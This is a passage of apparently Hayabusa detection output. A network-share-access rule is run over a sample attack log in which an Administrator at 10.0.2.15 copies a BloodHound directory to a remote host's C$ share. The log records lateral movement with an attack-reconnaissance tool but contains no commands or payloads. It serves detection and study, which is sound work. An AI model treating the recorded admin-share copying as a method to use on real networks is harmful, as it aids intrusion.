Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images\src\icons : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.249 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images\src\utils : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.249 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-is : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.259 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-is\cjs : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.259 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-is\umd : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.259 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-lifecycles-compat : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.259 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-photo-gallery : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.269 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-photo-gallery\__test__ : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.269 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-photo-gallery\__test__\__snapshots__ : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.269 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-photo-gallery\coverage : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.269 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-photo-gallery\coverage\lcov-report : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.279 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-photo-gallery\dist : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.279 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-photo-gallery\docs : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.279 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-photo-gallery\docs\examples : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.279 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-photo-gallery\examples : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.289 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-photo-gallery\examples\src : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.289 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-photo-gallery\lib : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.289 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-photo-gallery\src : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.289 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-scrolllock : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.289 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-scrolllock\__tests__ : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.299 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-scrolllock\config : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.299 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-scrolllock\dist : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.299 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-scrolllock\node_modules : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.299 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-scrolllock\node_modules\react-prop-toggle : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.309 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-transition-group : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.309 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-transition-group\dist : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.309 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-transition-group\utils : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.309 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\readable-stream : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.319 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\readable-stream\doc : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.319 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\readable-stream\doc\wg-meetings : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.319 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\readable-stream\lib : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.319 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\readable-stream\lib\internal : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.319 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\regenerator-runtime : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.329 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\resize-observer-polyfill : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.329 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\resize-observer-polyfill\dist : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.329 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\resize-observer-polyfill\src : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.329 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\resize-observer-polyfill\src\shims : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.339 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\resize-observer-polyfill\src\utils : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.339 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\rimraf : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.339 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\safe-buffer : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.339 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\scheduler : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.339 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\scheduler\cjs : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.349 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\scheduler\umd : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.349 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\setimmediate : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.349 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\signal-exit : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.349 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\ssf : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.359 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\ssf\bin : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.359 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\stream-chain : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.359 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\stream-chain\tests : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.369 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\stream-json : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.369 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\stream-json\filters : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.369 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\stream-json\streamers : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.379 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\stream-json\tests : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.379 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\stream-json\utils : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.379 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\string_decoder : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.389 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\string_decoder\lib : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.389 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\text-encoding : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.389 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\text-encoding\lib : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.399 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\traverse : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.399 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\traverse\examples : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.399 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\traverse\test : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.409 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\typedarray : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:25.409 